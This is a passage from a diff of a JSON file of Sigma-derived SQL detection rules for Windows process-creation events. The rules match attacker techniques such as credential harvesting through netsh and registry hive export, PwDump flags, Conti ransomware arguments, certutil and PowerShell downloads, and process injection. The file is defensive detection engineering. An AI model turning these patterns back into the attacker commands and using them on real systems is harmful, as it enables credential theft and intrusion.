'%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "title": "Unusual Parent Process For Cmd.EXE", + "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "description": "Detects suspicious parent process for cmd.exe", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_cmd_unusual_parent.yml" }, { - "title": "VsCode Child Process Anomaly", - "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "title": "Suspicious ScreenSave Change by Reg.exe", + "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" + "GPO" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\code.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" + "filename": "proc_creation_win_reg_screensaver.yml" }, { - "title": "Potential Windows Defender Tampering Via Wmic.EXE", - "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", - "status": "experimental", - "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", - "author": "frack113", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", + "status": "test", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_namespace_defender.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "Suspicious Scan Loop Network", - "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "title": "Potential DLL Injection Or Execution Using Tracker.exe", + "id": "148431ce-4b70-403d-8525-fcc2993f29ea", "status": "test", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", - "author": "frack113", + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_network_scan_loop.yml" + "filename": "proc_creation_win_lolbin_tracker.yml" }, { - "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "id": "eee00933-a761-4cd0-be70-c42fe91731e7", - "status": "test", - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "author": "Victor Sergeev, oscd.community", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "status": "experimental", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", - "id": "42b1a5b8-353f-4f10-b256-39de4467faff", - "status": "test", - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "author": "Andreas Hunkeler (@Karneades), oscd.community", + "title": "Ilasm Lolbin Use Compile C-Sharp", + "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "status": "experimental", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" ], - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" + "filename": "proc_creation_win_lolbin_ilasm.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "title": "Suspicious Diantz Alternate Data Stream Execution", + "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "status": "test", + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Authorized administrative activity" + "Very Possible" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_lolbin_diantz_ads.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", - "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.t1027", "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.t1216" ], "falsepositives": [ - "Administrative script libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Lolbin Defaultpack.exe Use As Proxy", - "id": "b2309017-4235-44fe-b5af-b15363011957", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 